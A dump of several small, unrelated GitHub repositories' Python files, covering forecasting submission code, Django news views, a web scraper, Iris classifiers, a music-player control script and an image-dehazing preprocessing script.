predict_and_prepare_submit_recursive(model_id, month):\n ### get prediction\n parameters = get_model_parameters(model_id)\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n fcst_date = 1914 - 28 * month\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n values = list(encoder.mapping[by_variable].keys())\n\n prediction = []\n for value in values:\n print(f'Preparing prediction for {value}')\n abt = pd.read_pickle(f'./work/abt_recursive_{fcst_date}_{history_length}_{value}.pkl')\n abt.sort_values(['id', 'day'], inplace=True)\n m = lgb.Booster(model_file=f'./work/{model_id}_{month}_{value}.lgb')\n prediction.append(get_prediction_recursive(abt, m, model_id, fcst_date = fcst_date))\n\n prediction = pd.concat(prediction)\n prediction.to_csv(\"./fin_submission/final_prediction.csv\")\n ### submit prediction\n prediction.columns = [f\"F{x+1-fcst_date}\" for x in prediction.columns]\n prediction.reset_index(inplace=True)\n prediction['id'] = encoder.decode(prediction, 'id')\n prediction.set_index('id', inplace=True)\n\n example = pd.read_csv('./data/sample_submission.csv')\n submission = example[['id']].join(prediction, on='id')\n prediction.reset_index(inplace=True)\n prediction['id'] = prediction['id'].str[:-len(\"validation\")] + \"evaluation\"\n # prediction.set_index('id', inplace=True)\n submission = pd.concat([submission, prediction])\n submission.to_csv(f'./fin_submission/{model_id}.csv', index=False)\n pass\n" } ]
5
nw371/NP51
https://github.com/nw371/NP51
8e44bcb96eed820faaeb11c08acf6b0575869121
c2f7c7da241663b5f33e4f6d23978b7f10cf9c01
54c13bd964b81bc8d0dc955aa9601a6cdd7616c6
refs/heads/master
2023-07-24T00:51:11.221923
2021-09-07T21:34:37
2021-09-07T21:34:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7227404117584229, "alphanum_fraction": 0.7237053513526917, "avg_line_length": 48.31745910644531, "blob_id": "5cd56c004ce440ce5892fd47f97d654b00d214d2", "content_id": "e472e6497777286ae6e1d4c88237bc3788e5a72b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4158, "license_type": "no_license", "max_line_length": 180, "num_lines": 63, "path": "/news/views.py", "repo_name": "nw371/NP51", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import ListView, DetailView, TemplateView, FormView, UpdateView, DeleteView\nfrom .forms import PostForm\nfrom .filters import PostFilter\nfrom .models import Post\n\nclass News(ListView):\n model = Post # указываем модель, объекты которой мы будем выводить\n template_name = 'news.html' # указываем имя шаблона, в котором будет лежать HTML, в котором будут все инструкции о том, как именно пользователю должны вывестись наши объекты\n context_object_name = 'news' # это имя списка, в котором будут лежать все объекты, его надо указать, чтобы обратиться к самому списку объектов через HTML-шаблон\n queryset = Post.objects.order_by('-date')\n paginate_by = 10\n\nclass SearchNews(ListView):\n model = Post # указываем модель, объекты которой мы будем выводить\n template_name = 'search.html' # указываем имя шаблона, в котором будет лежать HTML, в котором будут все инструкции о том, как именно пользователю должны вывестись наши объекты\n context_object_name = 'search' # это имя списка, в котором будут лежать все объекты, его надо указать, чтобы обратиться к самому списку объектов через HTML-шаблон\n queryset = Post.objects.order_by('-date')\n paginate_by = 5\n\n def get_context_data(self, **kwargs): # забираем отфильтрованные объекты переопределяя метод get_context_data у наследуемого класса (привет, полиморфизм, мы скучали!!!)\n context = super().get_context_data(**kwargs)\n context['filter'] = PostFilter(self.request.GET, queryset=self.get_queryset()) # вписываем наш фильтр в контекст\n return context\n\n# создаём представление, в котором будут детали конкретного отдельного товара\nclass PostDetail(DetailView):\n model = Post # модель всё та же, но мы хотим получать детали конкретно отдельного товара\n template_name = 'post.html' # название шаблона будет product.html\n context_object_name = 'post' # название объекта. в нём будет\n\nclass AddPub(FormView):\n model = Post\n template_name = 'add.html'\n context_object_name = 'add'\n form_class = PostForm\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST) # создаём новую форму, забиваем в неё данные из POST-запроса\n\n if form.is_valid(): # если пользователь ввёл всё правильно и нигде не ошибся, то сохраняем новый товар\n form.save()\n\n return super().get(request, *args, **kwargs)\n\nclass PostEdit(LoginRequiredMixin, UpdateView):\n #model = Post # модель всё та же, но мы хотим получать детали конкретно отдельного товара\n template_name = 'edit.html' # название шаблона будет product.html\n #context_object_name = 'post' # название объекта. в нём будет\n form_class = PostForm\n\n def get_object(self, **kwargs):\n id = self.kwargs.get('pk')\n return Post.objects.get(pk=id)\n\nclass PostDelete(DeleteView):\n\n template_name = 'delete.html' # название шаблона будет product.html\n queryset = Post.objects.all()\n success_url = '/news/'\n\nclass LoginPage(TemplateView):\n template_name = 'login.html'\n\n\n" } ]
1
andreastsimerikas/scraper
https://github.com/andreastsimerikas/scraper
d7b25c68ee60a54bef6496190255b900e0b508c6
c8f230acbcfbf90d7e19984171cdd111888d54f8
48fe4de27bce492c2a9a27a330290a8b4eaba1ae
refs/heads/main
2023-08-27T00:52:33.765392
2021-11-07T09:34:05
2021-11-07T09:34:05
424,673,828
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6367521286010742, "alphanum_fraction": 0.6524216532707214, "avg_line_length": 25.80769157409668, "blob_id": "f686494b8b222cd0e21bdbdf1f7c70cdc11cddc0", "content_id": "6ac8bd679a930c3d63d7046983173fd0c54aae1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 110, "num_lines": 26, "path": "/main.py", "repo_name": "andreastsimerikas/scraper", "src_encoding": "UTF-8", "text": "from time import sleep\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\n\nphones = []\n\nfor page in range(5):\n try:\n page = requests.get(\"https://www.skroutz.gr/c/40/kinhta-thlefwna/m/15053/Xiaomi.html?page=\"+str(page))\n soup = BeautifulSoup(page.text, \"html.parser\")\n except requests.exceptions.RequestException as error:\n print(error)\n\n\n phone_data = soup.findAll('li', attrs= {'class': \"cf card with-skus-slider\"})\n\n for data in phone_data:\n phones.append(data.find(\"div\", class_ = \"card-content\").h2.a.text) \n\n print(phones) \n sleep(5)\n \nphones_df = pd.DataFrame({\"Phone\": phones}) \nprint(phones_df)\n\n\n\n\n\n" } ]
1
Alunkar/Machine-Learning-Projects
https://github.com/Alunkar/Machine-Learning-Projects
51f3e344c90a7dc93c82573fd1b46920276cf22e
b0051f0e673bd02a36d815b6de52e9c2a15d825e
0c9f0d285cfba654a5b396e88491015f724369fe
refs/heads/master
2021-01-02T17:05:02.062183
2020-02-11T12:03:43
2020-02-11T12:03:43
239,711,645
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6836646795272827, "alphanum_fraction": 0.7009507417678833, "avg_line_length": 21.8125, "blob_id": "8183a48d59bae72fd0fc34efc23f21cb07ee72f4", "content_id": "bc83fbf90a9ffb113835348861d83b70ba48f333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 147, "num_lines": 48, "path": "/Iris Species classification using Decision tree algorithm.py", "repo_name": "Alunkar/Machine-Learning-Projects", "src_encoding": "UTF-8", "text": "import numpy as np;\r\nfrom sklearn import tree;\r\nfrom sklearn.datasets import load_iris;\r\n\r\n\r\niris = load_iris();\r\n\r\nprint(\"Features :\");\r\nprint(iris.feature_names);\r\n\r\nprint(\"Target :\");\r\nprint(iris.target_names);\r\n\r\ntest_index = [1,51,101];\r\n\r\n#TRAIN\r\ntrain_target = np.delete(iris.target,test_index); #train_target has 147x1 targets\r\ntrain_data = np.delete(iris.data,test_index,axis=0);#train_data has data of 147x4 flowers \r\n\r\n#TEST\r\ntest_target = iris.target[test_index];#test_target has 3x1 targets\r\ntest_data = iris.data[test_index];#test_data has 3x4 data\r\n\r\n#decide Algo\r\nclf = tree.DecisionTreeClassifier();\r\n\r\n#train Data\r\nclf.fit(train_data,train_target);\r\n\r\n\r\nprint(\"values for testing\");\r\nprint(test_target);\r\n\r\n#test DATA\r\nrslt = clf.predict(test_data);\r\n\r\nprint(\"After testing: \",rslt);\r\n\r\n\r\n#Visuals\r\nfrom sklearn.externals.six import StringIO;\r\nimport pydot;\r\n\r\ndot_data = StringIO();\r\n\r\ntree.export_graphviz(clf,out_file=dot_data,feature_names=iris.feature_names,class_names=iris.target_names,filled=True,rounded=True,impurity=False);\r\ngraph = pydot.graph_from_dot_data(dot_data.getvalue());\r\ngraph[0].write_pdf(\"ML.pdf\");\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6495685577392578, "alphanum_fraction": 0.6572387218475342, "avg_line_length": 23.463415145874023, "blob_id": "fd75c15dca85b7be2dff114853913a36db295272", "content_id": "137ebe0b37523d64861ac00514e14a1129efcf71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 96, "num_lines": 82, "path": "/Iris Species classification using KNN algorithm.py", "repo_name": "Alunkar/Machine-Learning-Projects", "src_encoding": "UTF-8", "text": "from sklearn import tree\r\nfrom scipy.spatial import distance\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nclass MyKNN():\r\n\tdef fit(self,TrainingData, TrainingTarget):\r\n\t\tself.TrainingData = TrainingData;\r\n\t\tself.TrainingTarget = TrainingTarget;\r\n\r\n\tdef predict(self,TestData):\r\n\t\tpredictions = [];\r\n\t\tfor eachrow in TestData:\r\n\t\t\tlabel = self.closest(eachrow);\r\n\t\t\tpredictions.append(label);\r\n\t\treturn predictions;\r\n\r\n\tdef closest(self,eachrow):\r\n\t\tbestdistance = euc(eachrow,self.TrainingData[0]);\r\n\t\tbestindex = 0;\r\n\r\n\t\tfor i in range(1, len(self.TrainingData)):\r\n\t\t\tdist = euc(eachrow,self.TrainingData[i]);\r\n\r\n\t\t\tif dist < bestdistance:\r\n\t\t\t\tbestdistance = dist;\r\n\t\t\t\tbestindex = i;\r\n\t\treturn self.TrainingTarget[bestindex];\r\n\r\ndef euc(a,b):\r\n\treturn distance.euclidean(a,b);\r\n\r\ndef MyKNeighbor():\r\n\tborder = '-'*60;\r\n\r\n\tiris = load_iris();\r\n\r\n\tdata = iris.data;\r\n\ttarget = iris.target;\r\n\r\n\tprint(border);\r\n\tprint(\"Actual Dataset\");\r\n\tprint(border);\r\n\r\n\tfor i in range(len(iris.target)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i,iris.data[i],iris.target[i]));\r\n\tprint(\"Size of Dataset: %d\" %(i+1))\r\n\r\n\tdata_train, data_test, target_train, target_test = train_test_split(data,target,test_size=0.35)\r\n\r\n\tprint(border);\r\n\tprint(\"Training Dataset\");\r\n\tprint(border);\r\n\tfor i in range(len(data_train)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i+1,data_train[i],target_train[i]));\r\n\tprint(\"Size of Training Dataset: %d\" %(i+1))\r\n\t\r\n\t\r\n\tprint(border);\r\n\tprint(\"Testing Dataset\");\r\n\tprint(border);\r\n\tfor i in range(len(data_test)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i+1,data_test[i],target_test[i]));\r\n\tprint(\"Size of Training Dataset: %d\" %(i+1))\r\n\tprint(border);\r\n\r\n\r\n\tclf = MyKNN();\r\n\tclf.fit(data_train,target_train);\r\n\tpredictions = clf.predict(data_test);\r\n\tAccuracy = accuracy_score(target_test,predictions);\r\n\r\n\treturn Accuracy;\r\n\r\ndef main():\r\n\r\n\tAccuracy = MyKNeighbor();\r\n\tprint('Accuracy with KNN is: ',(Accuracy*100),'%');\r\n\r\nif __name__ == \"__main__\":\r\n\tmain();" } ]
2
PTNobel/musicctl
https://github.com/PTNobel/musicctl
6eccdcf3c5326d5f97b0b058e516cd5e9049a8a7
c311d025176564dc1ed09d5143519bbdf1b0f2a5
f7797b3a1d7cea51c8fe71c66844240856bc54b9
refs/heads/master
2021-04-29T10:54:35.581057
2017-01-02T20:50:05
2017-01-02T20:50:05
77,860,724
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039227247238159, "alphanum_fraction": 0.6048009395599365, "avg_line_length": 27.46666717529297, "blob_id": "2b5e621dccbcc419e91d11aaadb14a69ae2ceea0", "content_id": "bba707ebfb9e61c8a6bee7303de57eb30cb54bee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3416, "license_type": "permissive", "max_line_length": 78, "num_lines": 120, "path": "/process.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom os import listdir as _listdir\nfrom os.path import join as _join\nfrom typing import List, Dict\n\n\n__all__ = [\n \"is_comm_running\",\n \"get_comms_to_pids\",\n \"get_pids_to_comms\",\n \"get_pids_to_cmdlines\",\n \"get_pids_of_comm\",\n \"get_comm_of_pid\",\n \"get_pids\",\n \"get_comms\",\n \"get_pids_of_comm\",\n \"update_buffers\",\n \"get_cmdline_of_pid\",\n]\n\n_buffer_map_pids_to_comms = {} # type: Dict[str, str]\n_buffer_map_pids_to_cmdlines = {} # type: Dict[str, List[str]]\n_buffer_map_comms_to_pids = {} # type: Dict[str, List[str]]\n_buffer_running_pids = [] # type: List[str]\n_buffer_list_of_comms = [] # type: List[str]\n\n\ndef _build_buffers() -> None:\n global _buffer_map_pids_to_comms\n global _buffer_map_pids_to_cmdlines\n global _buffer_running_pids\n global _buffer_list_of_comms\n global _buffer_map_comms_to_pids\n global _buffer_map_comms_to_pids\n\n _buffer_map_pids_to_comms = {} # Dict[str, str]\n _buffer_map_pids_to_cmdlines = {} # Dict[str, List[str]]\n _buffer_running_pids = [pid for pid in _listdir('/proc') if pid.isdigit()]\n _buffer_list_of_comms = [] # List[str]\n _buffer_map_comms_to_pids = {} # type: Dict[str, List[str]]\n\n for index, pid in enumerate(_buffer_running_pids):\n try:\n comm_file = open(_join('/proc', pid, 'comm'), 'r')\n comm = comm_file.read().rstrip('\\n')\n comm_file.close()\n _buffer_map_pids_to_comms[pid] = comm\n\n cmd_file = open(_join('/proc', pid, 'cmdline'), 'r')\n cmd = cmd_file.read().rstrip('\\n')\n cmd_file.close()\n cmdline = cmd.split('\\x00')\n\n _buffer_map_pids_to_cmdlines[pid] = cmdline\n\n if comm not in _buffer_list_of_comms:\n _buffer_list_of_comms.append(comm)\n _buffer_map_comms_to_pids[comm] = list()\n\n _buffer_map_comms_to_pids[comm].append(pid)\n\n except FileNotFoundError:\n _buffer_running_pids.pop(index)\n\n\ndef update_buffers() -> None:\n _build_buffers()\n\n\ndef get_pids() -> List[str]:\n \"\"\"Returns a list of pids\"\"\"\n return _buffer_running_pids\n\n\ndef get_comms() -> List[str]:\n \"\"\"Returns a list of comms\"\"\"\n return _buffer_list_of_comms\n\n\ndef get_comms_to_pids() -> Dict[str, List[str]]:\n \"\"\"Returns a dict of comms as keys and a list of pids as values\"\"\"\n return _buffer_map_comms_to_pids\n\n\ndef get_pids_to_comms() -> Dict[str, str]:\n \"\"\"Returns a dict of pids as keys and a string of the comm as values\"\"\"\n return _buffer_map_pids_to_comms\n\n\ndef get_pids_of_comm(comm: str) -> List[str]:\n \"\"\"Returns a list of all pids with comm\"\"\"\n try:\n pids = _buffer_map_comms_to_pids[comm]\n except KeyError:\n pids = []\n return pids\n\n\ndef get_pids_to_cmdlines() -> Dict[str, List[str]]:\n \"\"\"Returns a dict of pids as keys and a string of the comm as values\"\"\"\n return _buffer_map_pids_to_cmdlines\n\n\ndef get_comm_of_pid(pid: str) -> str:\n \"\"\"Returns the str of the comm of a pid\"\"\"\n return _buffer_map_pids_to_comms[pid]\n\n\ndef get_cmdline_of_pid(pid: str) -> List[str]:\n \"\"\"Returns the list with each argv entry of pid as a different string\"\"\"\n return _buffer_map_pids_to_cmdlines[pid]\n\n\ndef is_comm_running(comm: str) -> bool:\n \"\"\"Returns a bool if any process with that comm is running\"\"\"\n return comm in _buffer_list_of_comms\n\n\n_build_buffers()\n" }, { "alpha_fraction": 0.5380741357803345, "alphanum_fraction": 0.5426522493362427, "avg_line_length": 25.003969192504883, "blob_id": "2fc7d281e89001e93631130f50d65e3a0673d146", "content_id": "ee2e4f3bb64ab994c78bb6465ce8c4ca5d85cfc0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6553, "license_type": "permissive", "max_line_length": 77, "num_lines": 252, "path": "/player.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# A python3 port of musicctl.sh.\n\nimport time\nimport os\nimport sys\nimport re\nimport subprocess\nimport process\n\n\n# warning() functions like print, except it prefixes everything and prints to\n# stderr.\ndef warning(*objs, prefix='WARNING: '):\n printed_list = str(prefix)\n for i in objs:\n printed_list += str(i)\n print(printed_list, file=sys.stderr)\n\n\ndef get_keys(list_of_classes):\n for i in list_of_classes:\n print(\"For player \" + str(i) +\n \" the following commands are available:\")\n for j in sorted(i.commands.keys()):\n print(\" \" + j)\n\n exit(0)\n\n\nclass mpd:\n __name__ = 'mpd'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.back, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def _call_mpc(self, *option):\n devnull = open('/dev/null')\n subprocess.call(['mpc', *option], stdout=devnull.buffer)\n devnull.close()\n\n def __repr__(self):\n return self.__name__\n\n def pause(self):\n self._call_mpc('toggle')\n\n def back(self):\n self._call_mpc('prev')\n\n def next(self):\n self._call_mpc('next')\n\n def stop(self):\n self._call_mpc('stop')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n try:\n is_playing_present = b\"playing\" in subprocess.check_output(\n ['mpc', 'status'])\n except subprocess.CalledProcessError:\n is_playing_present = False\n return is_playing_present\n\n\n# Since the easiest way to control mopidy is through its mpd implementation,\n# the mopidy class inherets its implementation from the mpd class.\nclass mopidy(mpd):\n __name__ = 'mopidy'\n\n\nclass pianobar:\n __name__ = 'pianobar'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.like, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'tired': self.tired, 'like': self.like,\n 'dislike': self.dislike,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def __repr__(self):\n return self.__name__\n\n def _call_pianoctl(self, option):\n subprocess.call(\n ['pianoctl', option])\n\n def pause(self):\n self._call_pianoctl('p')\n\n def like(self):\n self._call_pianoctl('+')\n\n def dislike(self):\n self._call_pianoctl('-')\n\n def next(self):\n self._call_pianoctl('n')\n\n def stop(self):\n self._call_pianoctl('q')\n # if pianobar isn't responding kill it.\n time.sleep(1)\n process.update_buffers()\n if process.is_comm_running(\"pianobar\"):\n subprocess.call(['kill'] + process.get_pids_of_comm('pianobar'))\n\n def tired(self):\n self._call_pianoctl('t')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n log1_time_stamp, success1 = self._get_time()\n time.sleep(2)\n log2_time_stamp, success2 = self._get_time()\n\n if not (success1 and success2):\n output = False\n if log1_time_stamp == log2_time_stamp:\n output = False\n else:\n output = True\n return output\n\n def _get_time(self, tries=0):\n \"\"\"Reads the pianobar time, and returns a tuple of str '##:##/##:##'\n and a boolean which reflects whether it matches the regex\"\"\"\n log = open(os.path.expanduser('~/.config/pianobar/out'), 'r')\n time_stamp = log.read()[-12:-1]\n log.close()\n if re.match(r'^\\d{2}:\\d{2}/\\d{2}:\\d{2}$', time_stamp):\n return (time_stamp, True)\n elif tries < 3:\n time.sleep(1)\n return self._get_time(tries+1)\n else:\n return (time_stamp, False)\n\n\nclass playerctl:\n __name__ = 'playerctl'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.back, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def __repr__(self):\n return self.__name__\n\n def _call_playerctl(self, option):\n subprocess.call(\n ['playerctl', option])\n\n def pause(self):\n self._call_playerctl('play-pause')\n\n def back(self):\n self._call_playerctl('previous')\n\n def next(self):\n self._call_playerctl('next')\n\n def stop(self):\n self._call_playerctl('stop')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n try:\n is_playing_present = b\"Playing\" in subprocess.check_output(\n ['playerctl', 'status'])\n except subprocess.CalledProcessError:\n is_playing_present = False\n return is_playing_present\n\n\ndef current_player():\n list_of_process_names = process.get_comms()\n\n # pianobar get priority over mpd, unless mpd is playing.\n if 'mpd' in list_of_process_names:\n if 'pianobar' in list_of_process_names:\n if b'playing' in subprocess.check_output(['mpc', 'status']):\n output = mpd()\n else:\n output = pianobar()\n else:\n output = mpd()\n elif 'pianobar' in list_of_process_names:\n output = pianobar()\n elif 'mopidy' in list_of_process_names:\n output = mopidy()\n else:\n output = playerctl()\n\n return output\n\n\ndef is_playing():\n return current_player().is_playing()\n\n\ndef pause():\n current_player().commands['pause']()\n\n\ndef stop():\n current_player().commands['stop']()\n\n\ndef back():\n current_player().commands['back']()\n\n\ndef next_song():\n current_player().commands['next']()\n\n\ndef print_keys(list_of_classes=[mopidy, mpd, pianobar, playerctl]):\n for i in list_of_classes:\n player = i()\n print(\"For player \" + player.__repr__() +\n \" the following commands are available:\")\n for j in sorted(player.commands.keys()):\n print(\" \" + j)\n\n\nif __name__ == '__main__':\n print('Please don\\'t do this.')\n" }, { "alpha_fraction": 0.5178614854812622, "alphanum_fraction": 0.5249088406562805, "avg_line_length": 28.39285659790039, "blob_id": "95120954e332e2269d73160583ee2d15d0dd09d2", "content_id": "ec23728746ad38ae24f497ddf1393830ac680969", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 79, "num_lines": 140, "path": "/musicctl.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# A python3 port of musicctl.sh.\n\nimport os\nimport sys\nimport player\n\n\n# warning() functions like print, except it prefixes everything and prints to\n# stderr.\ndef warning(*objs, prefix='WARNING: '):\n printed_list = str(prefix)\n for i in objs:\n printed_list += str(i)\n print(printed_list, file=sys.stderr)\n\n\ndef usage(exit_code, name):\n usage_text = \"Usage: %s {[a command]|player|commands|usage|help}\" % name\n\n if exit_code == 0:\n print(usage_text)\n elif exit_code > 0:\n warning(usage_text, prefix='')\n elif exit_code < 0:\n usage(exit_code, name)\n exit(exit_code)\n\n\ndef processargs(input_argv):\n\n # All of these run in the same scope as processargs(). They make changes to\n # output.\n def _help():\n usage(0, output['name'])\n\n def _trial():\n output[\"test_mode_prefix\"] = 'echo '\n output[\"test_mode_suffix\"] = ''\n\n def _player():\n if '=' in input_argv[i]:\n player = input_argv[i].split('=')[1]\n else:\n player = input_argv[i + 1]\n indexes_to_ignore.append(i + 1)\n try:\n output[\"player\"] = {\n 'mpd': player.mpd,\n 'mpc': player.mpd,\n 'pianobar': player.pianobar,\n 'pianoctl': player.pianobar,\n 'playerctl': player.playerctl,\n 'mpris': player.playerctl,\n }[player]()\n except KeyError:\n warning('Invalid player')\n exit(1)\n\n # In place of a switch-case statement the following dictionaires link argv\n # entries to functions.\n long_args_to_disc = {'--help': _help,\n '--trial': _trial, '--player': _player}\n short_args_to_disc = {'h': _help, 't': _trial, 'p': _player}\n output = {\"input\": None,\n \"test_mode_prefix\": '',\n \"test_mode_suffix\": ' >/dev/null',\n \"name\": os.path.basename(input_argv[0]),\n \"player\": None,\n }\n indexes_to_ignore = list()\n\n if len(input_argv) == 1:\n warning(\"Not enough arguments\")\n usage(1, output['name'])\n else:\n # range() starts at 1 to prevent the name from being processed.\n for i in range(1, len(input_argv)):\n if i in indexes_to_ignore:\n continue\n\n elif len(input_argv[i]) >= 2 and input_argv[i][0:2] == '--':\n try:\n long_args_to_disc[input_argv[i].split('=')[0]]()\n except KeyError:\n warning(\"Invalid argument\", prefix='')\n usage(1, output['name'])\n\n elif input_argv[i][0] == '-' and input_argv[i][1] != '-':\n for j in range(1, len(input_argv[i])):\n try:\n short_args_to_disc[input_argv[i][j]]()\n except KeyError:\n warning(\"Invalid argument\", prefix='')\n usage(1, output['name'])\n\n elif output[\"input\"] is None:\n output[\"input\"] = input_argv[i]\n\n else:\n warning(\"Error parsing arguments\")\n usage(1, output['name'])\n\n return output\n\n\n# global arguments\narguments = processargs(sys.argv)\n\n\ndef main(arguments):\n # Handle help and usage correctly:\n if arguments[\"input\"] == \"usage\" or arguments[\"input\"] == \"help\":\n usage(0, arguments['name'])\n\n if arguments[\"input\"] == \"commands\":\n player.print_keys()\n exit(0)\n\n # Figure out what player is running.\n if arguments['player'] is not None:\n current_player = arguments['player']\n else:\n current_player = player.current_player()\n if arguments[\"input\"] == \"player\":\n print(current_player)\n exit(0)\n\n # Catching a KeyError should prevent this from exploding over the user\n # giving invalid input.\n try:\n current_player.commands[arguments[\"input\"]]()\n except KeyError:\n warning(\"Invalid input.\")\n usage(1, arguments['name'])\n\n\nif __name__ == \"__main__\":\n main(arguments)\n" } ]
3
TanyaJPG/MyRepository
https://github.com/TanyaJPG/MyRepository
814457ca9977aae74075cd19ddc89d7baae34c32
9c70a3c69eb103558817cb57321d0db5125a9677
9d8c0a0038cea9c4796de674503dd2db5a2a2a9c
refs/heads/main
2023-01-27T20:28:45.093476
2020-12-04T10:58:45
2020-12-04T10:58:45
318,178,031
0
0
null
2020-12-03T11:56:54
2020-12-03T12:12:16
2020-12-04T10:58:45
Python
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 25, "blob_id": "002d4dd98a71fae781513dbfd1901000e4ac83c9", "content_id": "78a05aa8591d69cd025ce6767dca6537afd4cd88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/child_file.py", "repo_name": "TanyaJPG/MyRepository", "src_encoding": "UTF-8", "text": "Child file content here\nprint (\"inside child file\")\n" }, { "alpha_fraction": 0.8166666626930237, "alphanum_fraction": 0.8166666626930237, "avg_line_length": 29, "blob_id": "f021b126ce5f31fec8ec5bb97b89f530e18c8237", "content_id": "e967650b9b80920031a56ce6c0ef0882f5c7af20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "no_license", "max_line_length": 44, "num_lines": 2, "path": "/README.md", "repo_name": "TanyaJPG/MyRepository", "src_encoding": "UTF-8", "text": "# MyRepository\nMy first repository I have made some changes\n" } ]
2
haipnh/BeDDE-for-defogging
https://github.com/haipnh/BeDDE-for-defogging
e440490220e3fb3303f6717987ebfbd376a4130a
ec9560820ed66d432e8445977ccbcb12bf2de012
625e0320c7c0d69acd555f274c9c803ea94ebff1
refs/heads/master
2023-03-30T14:48:33.267922
2021-04-06T04:00:46
2021-04-06T04:00:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5996967554092407, "alphanum_fraction": 0.6315390467643738, "avg_line_length": 22.553571701049805, "blob_id": "3278cae3f60243d045e0914d8e88d25dfb5d365f", "content_id": "33494e927bae95a31f014f2e1178fa92e78a050c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "no_license", "max_line_length": 80, "num_lines": 56, "path": "/DCPDN/generate_testsample.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "#coding=utf-8\nfrom __future__ import division\n\nimport sys\nsys.path.append(\"./mingqingscript\")\n\n\nimport os\nimport glob\nimport h5py\n\nimport numpy as np\nfrom scipy import misc\n\n\ndef array2PIL(arr, size):\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*numpy.ones((len(arr),1), numpy.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n# ------------------\ntest_image_root = './demo_image/'\nsave_root = './demo_image/'\n\n\nsave_size = 512 # 512 is default\n# ------------------\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\ncurImageNames = glob.glob(os.path.join(test_image_root,'*.png'))\n\nfor imgName in curImageNames:\n print('process %s'%imgName)\n img = misc.imread(imgName)\n\n img_rs = misc.imresize(img, (save_size,save_size), 'bilinear').astype(float)\n haze_image=img_rs\n # gt_img=img_rs\n\n # img = img/255\n\n haze_image=haze_image/255\n # gt_img=gt_img/255\n\n prefix = imgName.split('/')[-1][:-4]\n saveFilePath = os.path.join(save_root, prefix+'.h5')\n h5f=h5py.File( saveFilePath,'w')\n\n h5f.create_dataset('haze',data=haze_image)\n h5f.create_dataset('trans',data=0)\n h5f.create_dataset('ato',data=0)\n h5f.create_dataset('gt',data=0)\n" }, { "alpha_fraction": 0.7216642498970032, "alphanum_fraction": 0.7474892139434814, "avg_line_length": 29.30434799194336, "blob_id": "ff3cccb314df54afdcf0b9e0dd4eb2851854ef63", "content_id": "0eb9c5447da1353e471a9c743a6b66eb35de4871", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 697, "license_type": "no_license", "max_line_length": 165, "num_lines": 23, "path": "/DCPDN/README.md", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "## Our environment\n\n- Ubuntu 16.04\n- Python v3.5\n- PyTorch v0.3.1 